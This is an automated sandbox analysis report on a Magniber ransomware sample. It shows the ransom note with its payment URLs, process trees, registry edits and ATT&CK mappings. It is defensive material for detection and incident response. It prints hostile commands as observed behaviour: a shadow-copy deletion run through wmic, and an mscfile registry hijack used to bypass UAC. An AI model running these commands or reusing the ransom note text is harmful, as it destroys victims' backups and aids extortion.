magniber | 0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6

Analysis

max time kernel
141s
max time network
186s
platform
windows7_x64
resource
win7v20210410
submitted
22-06-2021 14:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6.exe
Size

21KB
MD5

24d60185a9e294a60c03b90fe731a04a
SHA1

c46b6a52efe81e02da8084f197efce7cb482f897
SHA256

0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6
SHA512

4419eaf48a932c9139c891ee36f51c8a7087357b2de56378a2c3399d8635f90460b30e16dc2b11db704a5f2e702fd116f292f723856b0fca008861eef8302674

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://e45c32b0aa14c040dayzboiuv.ndkeblzjnpqgpo5o.onion/yzboiuv Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://e45c32b0aa14c040dayzboiuv.lieedge.casa/yzboiuv http://e45c32b0aa14c040dayzboiuv.wonride.site/yzboiuv http://e45c32b0aa14c040dayzboiuv.lognear.xyz/yzboiuv http://e45c32b0aa14c040dayzboiuv.bejoin.space/yzboiuv Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://e45c32b0aa14c040dayzboiuv.ndkeblzjnpqgpo5o.onion/yzboiuv

http://e45c32b0aa14c040dayzboiuv.lieedge.casa/yzboiuv

http://e45c32b0aa14c040dayzboiuv.wonride.site/yzboiuv

http://e45c32b0aa14c040dayzboiuv.lognear.xyz/yzboiuv

http://e45c32b0aa14c040dayzboiuv.bejoin.space/yzboiuv

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 8 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.execmd.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1564	560	cmd.exe	45
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1072	560	cmd.exe	45
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1372	560	cmd.exe	45
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1424	560	cmd.exe	45
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2632	560	vssadmin.exe	45
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2624	560	vssadmin.exe	45
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2640	560	vssadmin.exe	45
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2700	560	vssadmin.exe	45

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

taskhost.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\InvokeSearch.tiff	taskhost.exe
File renamed	C:\Users\Admin\Pictures\InvokeSearch.tiff => C:\Users\Admin\Pictures\InvokeSearch.tiff.yzboiuv	taskhost.exe
File renamed	C:\Users\Admin\Pictures\GrantUndo.raw => C:\Users\Admin\Pictures\GrantUndo.raw.yzboiuv	taskhost.exe
File renamed	C:\Users\Admin\Pictures\AssertOptimize.png => C:\Users\Admin\Pictures\AssertOptimize.png.yzboiuv	taskhost.exe
File opened for modification	C:\Users\Admin\Pictures\BackupAdd.tiff	taskhost.exe
File renamed	C:\Users\Admin\Pictures\BackupAdd.tiff => C:\Users\Admin\Pictures\BackupAdd.tiff.yzboiuv	taskhost.exe
File renamed	C:\Users\Admin\Pictures\DebugTrace.png => C:\Users\Admin\Pictures\DebugTrace.png.yzboiuv	taskhost.exe
File renamed	C:\Users\Admin\Pictures\RedoTrace.png => C:\Users\Admin\Pictures\RedoTrace.png.yzboiuv	taskhost.exe
File renamed	C:\Users\Admin\Pictures\RestartDisable.tif => C:\Users\Admin\Pictures\RestartDisable.tif.yzboiuv	taskhost.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

6.exe

description	pid	Process	procid_target
PID 1676 set thread context of 1140	1676	6.exe	19
PID 1676 set thread context of 1252	1676	6.exe	20
PID 1676 set thread context of 1292	1676	6.exe	21

Interacts with shadow copies 2 TTPs 4 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	Process
2632	vssadmin.exe
2624	vssadmin.exe
2640	vssadmin.exe
2700	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000051618adbbbd0f84eb34ff59fe7045e8f000000000200000000001066000000010000200000006a4a2fe2ecf763cf1ba7bd682b1d1cdf577a41f374f04bd6472a4abc43e4f567000000000e800000000200002000000025251572c95047a620d52a1f88c155b9441b238f86564f9d61dc360a9399b7ed9000000088bf7fd3fbda77c960716610904a73a47419f064eafc248ca75cd295369697eeac488bda4b631f823b3e4de6b52aef0dfeecfef440b77344b18a5cf6d866eda6dd2101b29aca6088bd9349db314853b27179636bfbaae246194e7ff2d939c81bcf5ddc667f332ae6e484a3506582779a1f1566190dd282238968ce43cb1b03bcd595fe0ae45dd573fa976c17a1fc466e400000002ff5319af1a4331e5da68f79ad4c13c555c993b70126cd58347fc441254b5a81620f07e0bb8fe5d61c0e2080eefa25a91a0ba8a39ebdae864bb910cf9494e6fb	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "331136077"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50afa39c7067d701	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{C427B821-D363-11EB-A787-52BBEA82F32C} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000051618adbbbd0f84eb34ff59fe7045e8f000000000200000000001066000000010000200000002e7adcae35d7f7dd93cec98a51177141b75a7df23735889aaa872ed52711c496000000000e800000000200002000000071d42583658651e8ac374ba35ea9a0ed3f621eb79ca32db923ceceaa0f1355472000000042cff419525a36b2e39db5862e6053282c220212f8e5784384cd25ff0c94be7940000000684157defa9d33bc568e56d0dba86ec1c99ce15e7467b76ddf046af0a0f82e8cdeeb365a20ade442d65351559fcd06b9575d09f0952edd6885d3556c5b82495c	iexplore.exe

Modifies registry class 11 IoCs

Processes:

taskhost.exeDwm.exe6.exeExplorer.EXE

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Dwm.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command	6.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhost.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

Processes:

notepad.exe

pid	Process
1792	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

6.exe

pid	Process
1676	6.exe
1676	6.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

iexplore.exe

pid	Process
1916	iexplore.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

6.exe

pid	Process
1676	6.exe
1676	6.exe
1676	6.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Explorer.EXEWMIC.exeWMIC.exeWMIC.exe

description	pid	Process
Token: SeShutdownPrivilege	1292	Explorer.EXE
Token: SeShutdownPrivilege	1292	Explorer.EXE
Token: SeShutdownPrivilege	1292	Explorer.EXE
Token: SeShutdownPrivilege	1292	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	868	WMIC.exe
Token: SeSecurityPrivilege	868	WMIC.exe
Token: SeTakeOwnershipPrivilege	868	WMIC.exe
Token: SeLoadDriverPrivilege	868	WMIC.exe
Token: SeSystemProfilePrivilege	868	WMIC.exe
Token: SeSystemtimePrivilege	868	WMIC.exe
Token: SeProfSingleProcessPrivilege	868	WMIC.exe
Token: SeIncBasePriorityPrivilege	868	WMIC.exe
Token: SeCreatePagefilePrivilege	868	WMIC.exe
Token: SeBackupPrivilege	868	WMIC.exe
Token: SeRestorePrivilege	868	WMIC.exe
Token: SeShutdownPrivilege	868	WMIC.exe
Token: SeDebugPrivilege	868	WMIC.exe
Token: SeSystemEnvironmentPrivilege	868	WMIC.exe
Token: SeRemoteShutdownPrivilege	868	WMIC.exe
Token: SeUndockPrivilege	868	WMIC.exe
Token: SeManageVolumePrivilege	868	WMIC.exe
Token: 33	868	WMIC.exe
Token: 34	868	WMIC.exe
Token: 35	868	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1168	WMIC.exe
Token: SeSecurityPrivilege	1168	WMIC.exe
Token: SeTakeOwnershipPrivilege	1168	WMIC.exe
Token: SeLoadDriverPrivilege	1168	WMIC.exe
Token: SeSystemProfilePrivilege	1168	WMIC.exe
Token: SeSystemtimePrivilege	1168	WMIC.exe
Token: SeProfSingleProcessPrivilege	1168	WMIC.exe
Token: SeIncBasePriorityPrivilege	1168	WMIC.exe
Token: SeCreatePagefilePrivilege	1168	WMIC.exe
Token: SeBackupPrivilege	1168	WMIC.exe
Token: SeRestorePrivilege	1168	WMIC.exe
Token: SeShutdownPrivilege	1168	WMIC.exe
Token: SeDebugPrivilege	1168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1168	WMIC.exe
Token: SeRemoteShutdownPrivilege	1168	WMIC.exe
Token: SeUndockPrivilege	1168	WMIC.exe
Token: SeManageVolumePrivilege	1168	WMIC.exe
Token: 33	1168	WMIC.exe
Token: 34	1168	WMIC.exe
Token: 35	1168	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1828	WMIC.exe
Token: SeSecurityPrivilege	1828	WMIC.exe
Token: SeTakeOwnershipPrivilege	1828	WMIC.exe
Token: SeLoadDriverPrivilege	1828	WMIC.exe
Token: SeSystemProfilePrivilege	1828	WMIC.exe
Token: SeSystemtimePrivilege	1828	WMIC.exe
Token: SeProfSingleProcessPrivilege	1828	WMIC.exe
Token: SeIncBasePriorityPrivilege	1828	WMIC.exe
Token: SeCreatePagefilePrivilege	1828	WMIC.exe
Token: SeBackupPrivilege	1828	WMIC.exe
Token: SeRestorePrivilege	1828	WMIC.exe
Token: SeShutdownPrivilege	1828	WMIC.exe
Token: SeDebugPrivilege	1828	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1828	WMIC.exe
Token: SeRemoteShutdownPrivilege	1828	WMIC.exe
Token: SeUndockPrivilege	1828	WMIC.exe
Token: SeManageVolumePrivilege	1828	WMIC.exe
Token: 33	1828	WMIC.exe
Token: 34	1828	WMIC.exe
Token: 35	1828	WMIC.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

Explorer.EXEiexplore.exe

pid	Process
1292	Explorer.EXE
1916	iexplore.exe
1292	Explorer.EXE
1292	Explorer.EXE
1292	Explorer.EXE
1292	Explorer.EXE

Suspicious use of SendNotifyMessage 6 IoCs

Processes:

Explorer.EXE

pid	Process
1292	Explorer.EXE
1292	Explorer.EXE
1292	Explorer.EXE
1292	Explorer.EXE
1292	Explorer.EXE
1292	Explorer.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid	Process
1916	iexplore.exe
1916	iexplore.exe
1992	IEXPLORE.EXE
1992	IEXPLORE.EXE
1992	IEXPLORE.EXE
1992	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 61 IoCs

Processes:

taskhost.execmd.exeDwm.exeExplorer.EXEcmd.exe6.execmd.execmd.execmd.exeiexplore.execmd.execmd.execmd.exeCompMgmtLauncher.exeCompMgmtLauncher.exeCompMgmtLauncher.exeCompMgmtLauncher.exe

description	pid	Process	procid_target
PID 1140 wrote to memory of 1792	1140	taskhost.exe	26
PID 1140 wrote to memory of 1792	1140	taskhost.exe	26
PID 1140 wrote to memory of 1792	1140	taskhost.exe	26
PID 1140 wrote to memory of 1564	1140	taskhost.exe	27
PID 1140 wrote to memory of 1564	1140	taskhost.exe	27
PID 1140 wrote to memory of 1564	1140	taskhost.exe	27
PID 1140 wrote to memory of 1536	1140	taskhost.exe	28
PID 1140 wrote to memory of 1536	1140	taskhost.exe	28
PID 1140 wrote to memory of 1536	1140	taskhost.exe	28
PID 1536 wrote to memory of 868	1536	cmd.exe	31
PID 1536 wrote to memory of 868	1536	cmd.exe	31
PID 1536 wrote to memory of 868	1536	cmd.exe	31
PID 1252 wrote to memory of 1476	1252	Dwm.exe	34
PID 1252 wrote to memory of 1476	1252	Dwm.exe	34
PID 1252 wrote to memory of 1476	1252	Dwm.exe	34
PID 1292 wrote to memory of 748	1292	Explorer.EXE	33
PID 1292 wrote to memory of 748	1292	Explorer.EXE	33
PID 1292 wrote to memory of 748	1292	Explorer.EXE	33
PID 1476 wrote to memory of 1168	1476	cmd.exe	36
PID 1476 wrote to memory of 1168	1476	cmd.exe	36
PID 1476 wrote to memory of 1168	1476	cmd.exe	36
PID 1676 wrote to memory of 732	1676	6.exe	37
PID 1676 wrote to memory of 732	1676	6.exe	37
PID 1676 wrote to memory of 732	1676	6.exe	37
PID 748 wrote to memory of 1828	748	cmd.exe	40
PID 748 wrote to memory of 1828	748	cmd.exe	40
PID 748 wrote to memory of 1828	748	cmd.exe	40
PID 1564 wrote to memory of 1916	1564	cmd.exe	41
PID 1564 wrote to memory of 1916	1564	cmd.exe	41
PID 1564 wrote to memory of 1916	1564	cmd.exe	41
PID 732 wrote to memory of 1088	732	cmd.exe	42
PID 732 wrote to memory of 1088	732	cmd.exe	42
PID 732 wrote to memory of 1088	732	cmd.exe	42
PID 1916 wrote to memory of 1992	1916	iexplore.exe	46
PID 1916 wrote to memory of 1992	1916	iexplore.exe	46
PID 1916 wrote to memory of 1992	1916	iexplore.exe	46
PID 1916 wrote to memory of 1992	1916	iexplore.exe	46
PID 1564 wrote to memory of 2016	1564	cmd.exe	55
PID 1564 wrote to memory of 2016	1564	cmd.exe	55
PID 1564 wrote to memory of 2016	1564	cmd.exe	55
PID 1072 wrote to memory of 524	1072	cmd.exe	56
PID 1072 wrote to memory of 524	1072	cmd.exe	56
PID 1072 wrote to memory of 524	1072	cmd.exe	56
PID 1424 wrote to memory of 2056	1424	cmd.exe	58
PID 1424 wrote to memory of 2056	1424	cmd.exe	58
PID 1424 wrote to memory of 2056	1424	cmd.exe	58
PID 1372 wrote to memory of 2072	1372	cmd.exe	57
PID 1372 wrote to memory of 2072	1372	cmd.exe	57
PID 1372 wrote to memory of 2072	1372	cmd.exe	57
PID 2056 wrote to memory of 2248	2056	CompMgmtLauncher.exe	63
PID 2056 wrote to memory of 2248	2056	CompMgmtLauncher.exe	63
PID 2056 wrote to memory of 2248	2056	CompMgmtLauncher.exe	63
PID 2072 wrote to memory of 2256	2072	CompMgmtLauncher.exe	62
PID 2072 wrote to memory of 2256	2072	CompMgmtLauncher.exe	62
PID 2072 wrote to memory of 2256	2072	CompMgmtLauncher.exe	62
PID 524 wrote to memory of 2272	524	CompMgmtLauncher.exe	59
PID 524 wrote to memory of 2272	524	CompMgmtLauncher.exe	59
PID 524 wrote to memory of 2272	524	CompMgmtLauncher.exe	59
PID 2016 wrote to memory of 2280	2016	CompMgmtLauncher.exe	61
PID 2016 wrote to memory of 2280	2016	CompMgmtLauncher.exe	61
PID 2016 wrote to memory of 2280	2016	CompMgmtLauncher.exe	61

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1140
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1792
- C:\Windows\system32\cmd.exe
  cmd /c "start http://e45c32b0aa14c040dayzboiuv.lieedge.casa/yzboiuv^&1^&52689493^&87^&359^&12"
  2⤵
  PID:1564
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://e45c32b0aa14c040dayzboiuv.lieedge.casa/yzboiuv&1&52689493&87&359&12
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1916
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1916 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1992
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1536
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:868

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1252
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1476
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1168

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1292
- C:\Users\Admin\AppData\Local\Temp\6.exe
  "C:\Users\Admin\AppData\Local\Temp\6.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1676
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:732
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      4⤵
      PID:1088
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:748
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1828

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1564
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2016
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2280

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1072
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:524
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2272

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1372
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2072
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2256

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1424
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2056
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2248

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2632

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2624

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2640

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2700

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2764

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\CD5R35ZH.txt

MD5
77261640fc32563e5e6ec6b64ea4e5b6

SHA1
42cc9d91625c151abe3a32226091769df14fa5c3

SHA256
ab8e4abc789147dc5b373157212575f1752403d5a82cdd52f869c540fffa17ba

SHA512
3104a9de3df880b0876c9f030bfea9f62e9ba23a33e59d6dd57ed88e985f6c0873f4f062e48030d577b56084ffe503097aabb5529976e6bd69e72fabd719bd0a

Download Submit
